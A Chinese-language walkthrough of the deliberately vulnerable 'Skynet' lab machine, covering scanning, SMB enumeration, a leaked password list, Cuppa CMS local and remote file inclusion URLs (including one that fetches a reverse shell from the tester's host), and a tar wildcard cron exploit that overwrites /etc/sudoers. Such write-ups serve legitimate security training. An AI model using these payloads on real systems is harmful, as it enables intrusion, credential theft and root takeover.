【靶机】skynet

简介: 本靶机有一定难度,适合进阶的小伙伴进行练习,初学者也可以参考学习。

skynet

前言

A vulnerable Terminator themed Linux machine.

信息收集

┌──(zacarx㉿zacarx)-[~]
└─$ sudo nmap -T4 -A 10.10.72.0
[sudo] zacarx 的密码:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 21:13 CST
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.72.0
Host is up (0.33s latency).
Not shown: 994 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP SASL RESP-CODES PIPELINING AUTH-RESP-CODE UIDL CAPA
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 capabilities have IDLE ENABLE LITERAL+ SASL-IR LOGINDISABLEDA0001 OK post-login listed more Pre-login ID LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/21%OT=22%CT=1%CU=36259%PV=Y%DS=5%DC=T%G=Y%TM=637B79
OS:D9%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=102%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST
OS:11NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC
OS:N(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 5 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| smb2-time: 
|   date: 2022-11-21T13:14:52
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2022-11-21T07:14:52-06:00

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   208.15 ms 10.17.0.1
2   ... 4
5   333.72 ms 10.10.72.0

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.01 seconds
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.72.0
[+] Threads:        32
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/11/21 13:31:57 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2022/11/21 13:32:18 Finished
===============================================================
┌──(zacarx㉿zacarx)-[~]
└─$ enum4linux 10.10.72.0 

.............

10.10.72.0/anonymous    Mapping: OK Listing: OK Writing: N/A
//10.10.72.0/milesdyson    Mapping: DENIED Listing: N/A Writing: N/A

............

smb 有个信息可以利用试试

一个attention.txt and log

补充一下:

(4条消息) Linux 网络通讯 : smbclient 命令详解_HarkerYX的博客-CSDN博客

smbclient命令 属于samba套件,它提供一种命令行使用交互式方式访问samba服务器的共享资源。 -w <工作群组> :指定工作群组名称。 smb服务器:指定要连接的smb服务器。 这里有许多命令和ftp命令相似,如 cd 、lcd、get、megt、put、mput等。 通过这些命令,我们可以访问远程主机的共享资源。

我们使用get命令把文件复制本地

┌──(zacarx㉿zacarx)-[~]
└─$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

所以,网站系统应该有点bug

我们看到

SquirrelMail version 1.4.23 [SVN]
By the SquirrelMail Project Team

查下有无可以利用的

好像木有

刚没下载上log

log内容:

┌──(zacarx㉿zacarx)-[~]
└─$ cat log*         
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

应该是密码。。。

账号是MilesDyson

or milesdyson

……….

okok

milesdyson

cyborg007haloterminator

我们进去后

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to

先试试)s{A&2Z=F^n_E.B`

┌──(zacarx㉿zacarx)-[~]
└─$ cat im* 

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
                                

看到一个私人页面

Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.

貌似有点问题

我们再看看有无其他目录

root@ip-10-10-173-215:~# gobuster dir -u http://10.10.72.0/45kra24zxs28v3yd/ -w '/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt' 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.72.0/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/11/21 14:18:31 Starting gobuster
===============================================================
/administrator (Status: 301)
............

我们看到一个管理员页面

看到了一个cms后台

再看下有无可以利用的

cuppa

Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion

  URL: https://www.exploit-db.com/exploits/25971
 Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt

File Type: C++ source, ASCII text, with very long lines (876)

跟着人家做一下payload看看

http://10.10.72.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

http://10.10.72.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

http://

../Configuration.php

<?php 
    class Configuration{
        public $host = "localhost";
        public $db = "cuppa";
        public $user = "root";
        public $password = "password123";
        public $table_prefix = "cu_";
        public $administrator_template = "default";
        public $list_limit = 25;
        public $token = "OBqIPqlFWf3X";
        public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
        public $upload_default_path = "media/uploadsFiles";
        public $maximum_file_size = "5242880";
        public $secure_login = 0;
        public $secure_login_value = "";
        public $secure_login_redirect = "";
    } 
?>

好像没法用 干

http://10.10.72.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.173.215:9090/1.php

1.php是反向shell文件

然后拿到user权限

我们发现了

定时任务可以利用

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
*/1 *    * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

这个我之前讲过

是一个比较古老的通配符提权漏洞

具体原理,看我之前视频

echo "/bin/bash" > shell.sh
echo "" > "/var/www/html/--checkpoint-action=exec=sh shell.sh"
echo "" > "/var/www/html--checkpoint=1"
tar cf backup.tar *
tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh /var/www/html/shell.sh

不过有点小毛病,大意了

没有人家 home创建修改的权限

我们就去自己“”家“”

/www/html

payload如下

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1

ok,就这麽多,xdm早点休息,hhhhhhh

目录
相关文章
|
2月前
|
网络协议 关系型数据库 MySQL
红日靶机(三)笔记
红日靶机(三)笔记
|
2月前
|
网络协议 JavaScript Linux
HTB-TwoMillion 靶机笔记
HTB-TwoMillion 靶机笔记
|
7月前
|
XML 存储 安全
w1r3s 靶机学习
w1r3s 靶机学习
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
91 0
VulnHub靶机DC2渗透测试笔记
|
安全 Shell PHP
Kira CTF靶机
Kira CTF靶机
112 0
|
安全 网络协议 Shell
HTB-Friendzone靶场
HTB-Friendzone靶场
|
安全 Shell 数据库
ColddBox 靶场
渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
122 0
ColddBox 靶场
|
SQL 安全 Shell
FristiLeaks v1.3靶机渗透
FristiLeaks v1.3靶机渗透
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
安全 关系型数据库 MySQL
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
224 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)